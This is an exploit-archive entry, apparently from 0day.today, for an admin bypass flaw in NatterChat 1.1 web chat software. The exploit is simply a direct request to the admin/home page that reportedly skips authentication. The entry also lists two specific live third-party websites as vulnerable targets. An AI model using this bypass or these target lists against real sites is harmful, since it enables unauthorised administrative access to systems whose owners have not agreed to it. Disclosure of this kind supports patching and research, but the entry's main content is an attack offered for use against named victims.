id: 4219
date: 11/20/2008
title: NatterChat 1.1 Remote Admin Bypass Vulnerability
author: Stack
cves: 

================================================
NatterChat 1.1 Remote Admin Bypass Vulnerability
================================================


==============================================================================
 NATTERCHAT v1.1  Admin Home Bypass Vulnerability
==============================================================================
 [»] Script  :          [ NATTERCHAT v1.1  ]
 [»] Discover:          [ Mountassif Moad  ]

===[ XPL ]===
 [»] http://localhost/[path]/admin/home.php
===[ LIVE ]===
 [»] http://www.welfarerights.net/natterchat/admin/home.asp
 [»] http://www.natterchat.co.uk/version11/admin/home.asp



#  0day.today [2023-03-26]  #